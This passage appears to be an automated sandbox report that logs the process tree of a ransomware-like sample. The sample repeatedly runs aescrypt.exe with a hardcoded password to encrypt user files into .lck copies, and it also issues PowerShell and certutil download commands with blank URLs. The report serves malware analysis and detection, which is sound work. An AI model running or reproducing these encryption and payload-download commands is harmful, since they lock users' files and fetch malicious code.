    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:3920
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
    3⤵
    PID:3216
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck" "Wallpaper.jpg.lck"
    3⤵
    PID:2100
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
    3⤵
    PID:3948
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck" "ResizeUndo.svgz.lck"
    3⤵
    PID:4452
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
    3⤵
    PID:3444
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck" "BackupImport.dxf.lck"
    3⤵
    PID:3572
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
    3⤵
    PID:3416
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck" "SyncDisable.gif.lck"
    3⤵
    PID:5080
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
    3⤵
    PID:4544
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck" "PublishClose.emf.lck"
    3⤵
    PID:3040
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
    3⤵
    PID:3616
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck" "ReadSuspend.ico.lck"
    3⤵
    PID:4556
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
    3⤵
    PID:3136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck" "EditPublish.jpg.lck"
    3⤵
    PID:3560
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
    3⤵
    - Modifies extensions of user files
    PID:3376
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck" "SendSearch.tif.lck"
    3⤵
    - Modifies extensions of user files
    PID:2924
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
    3⤵
    PID:3400
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck" "MoveTest.dib.lck"
    3⤵
    PID:1128
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
    3⤵
    PID:4532
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck" "ProtectUndo.emz.lck"
    3⤵
    PID:4124
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
    3⤵
    PID:3104
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck" "GetPublish.gif.lck"
    3⤵
    PID:3600
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
    3⤵
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck" "PublishStep.svgz.lck"
    3⤵
    PID:4796
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
    3⤵
    PID:4932
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck" "ResumeRequest.wmf.lck"
    3⤵
    PID:640
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
    3⤵
    PID:3360
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck" "OptimizeMeasure.dib.lck"
    3⤵
    PID:3604
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
    3⤵
    PID:3308
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck" "DenyPing.pcx.lck"
    3⤵
    PID:2316
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
    3⤵
    PID:3480
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck" "SwitchRedo.svg.lck"
    3⤵
    PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4824
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:2436
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    PID:3192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck.lck" "desktop.ini.lck.lck"
    3⤵
    PID:5072
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck" "Wallpaper.jpg"
    3⤵
    PID:3224
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck" "Wallpaper.jpg.lck"
    3⤵
    PID:3240
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Wallpaper.jpg.lck.lck.lck" "Wallpaper.jpg.lck.lck"
    3⤵
    PID:1228
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck" "ResizeUndo.svgz"
    3⤵
    PID:3388
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck" "ResizeUndo.svgz.lck"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3456
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResizeUndo.svgz.lck.lck.lck" "ResizeUndo.svgz.lck.lck"
    3⤵
    PID:1148
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck" "BackupImport.dxf"
    3⤵
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck" "BackupImport.dxf.lck"
    3⤵
    PID:2252
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BackupImport.dxf.lck.lck.lck" "BackupImport.dxf.lck.lck"
    3⤵
    PID:4492
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck" "SyncDisable.gif"
    3⤵
    PID:4904
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck" "SyncDisable.gif.lck"
    3⤵
    PID:1764
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SyncDisable.gif.lck.lck.lck" "SyncDisable.gif.lck.lck"
    3⤵
    PID:768
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck" "PublishClose.emf"
    3⤵
    PID:5092
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck" "PublishClose.emf.lck"
    3⤵
    PID:3100
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishClose.emf.lck.lck.lck" "PublishClose.emf.lck.lck"
    3⤵
    PID:3336
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck" "ReadSuspend.ico"
    3⤵
    PID:3576
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck" "ReadSuspend.ico.lck"
    3⤵
    PID:4012
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ReadSuspend.ico.lck.lck.lck" "ReadSuspend.ico.lck.lck"
    3⤵
    PID:1508
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck" "EditPublish.jpg"
    3⤵
    PID:3244
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck" "EditPublish.jpg.lck"
    3⤵
    PID:4032
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EditPublish.jpg.lck.lck.lck" "EditPublish.jpg.lck.lck"
    3⤵
    PID:4588
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck" "SendSearch.tif"
    3⤵
    - Modifies extensions of user files
    PID:3656
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck" "SendSearch.tif.lck"
    3⤵
    - Modifies extensions of user files
    PID:4824
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SendSearch.tif.lck.lck.lck" "SendSearch.tif.lck.lck"
    3⤵
    - Modifies extensions of user files
    PID:3228
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck" "MoveTest.dib"
    3⤵
    PID:4780
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck" "MoveTest.dib.lck"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MoveTest.dib.lck.lck.lck" "MoveTest.dib.lck.lck"
    3⤵
    PID:1604
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck" "ProtectUndo.emz"
    3⤵
    PID:3956
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck" "ProtectUndo.emz.lck"
    3⤵
    PID:2068
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ProtectUndo.emz.lck.lck.lck" "ProtectUndo.emz.lck.lck"
    3⤵
    PID:3908
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck" "GetPublish.gif"
    3⤵
    PID:692
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck" "GetPublish.gif.lck"
    3⤵
    PID:4768
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "GetPublish.gif.lck.lck.lck" "GetPublish.gif.lck.lck"
    3⤵
    PID:3220
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck" "PublishStep.svgz"
    3⤵
    PID:348
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck" "PublishStep.svgz.lck"
    3⤵
    PID:3964
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PublishStep.svgz.lck.lck.lck" "PublishStep.svgz.lck.lck"
    3⤵
    PID:1808
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck" "ResumeRequest.wmf"
    3⤵
    PID:744
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck" "ResumeRequest.wmf.lck"
    3⤵
    PID:3892
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeRequest.wmf.lck.lck.lck" "ResumeRequest.wmf.lck.lck"
    3⤵
    PID:3420
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck" "OptimizeMeasure.dib"
    3⤵
    PID:3588
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck" "OptimizeMeasure.dib.lck"
    3⤵
    PID:3496
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OptimizeMeasure.dib.lck.lck.lck" "OptimizeMeasure.dib.lck.lck"
    3⤵
    PID:1556
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck" "DenyPing.pcx"
    3⤵
    PID:2248
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck" "DenyPing.pcx.lck"
    3⤵
    PID:1632
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyPing.pcx.lck.lck.lck" "DenyPing.pcx.lck.lck"
    3⤵
    PID:212
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck" "SwitchRedo.svg"
    3⤵
    PID:2292
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck" "SwitchRedo.svg.lck"
    3⤵
    PID:1824
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SwitchRedo.svg.lck.lck.lck" "SwitchRedo.svg.lck.lck"
    3⤵
    PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5176
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:5284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:5316
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    PID:5328
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CompareMerge.midi.lck" "CompareMerge.midi"
    3⤵
    PID:5340
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "WatchSplit.xht.lck" "WatchSplit.xht"
    3⤵
    PID:5356
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InstallConvertFrom.dotm.lck" "InstallConvertFrom.dotm"
    3⤵
    PID:5368
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitRename.mp3.lck" "LimitRename.mp3"
    3⤵
    PID:5384
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SearchRedo.vdx.lck" "SearchRedo.vdx"
    3⤵
    PID:5400
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UseMeasure.vssx.lck" "UseMeasure.vssx"
    3⤵
    PID:5416
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExportDebug.wps.lck" "ExportDebug.wps"
    3⤵
    PID:5432
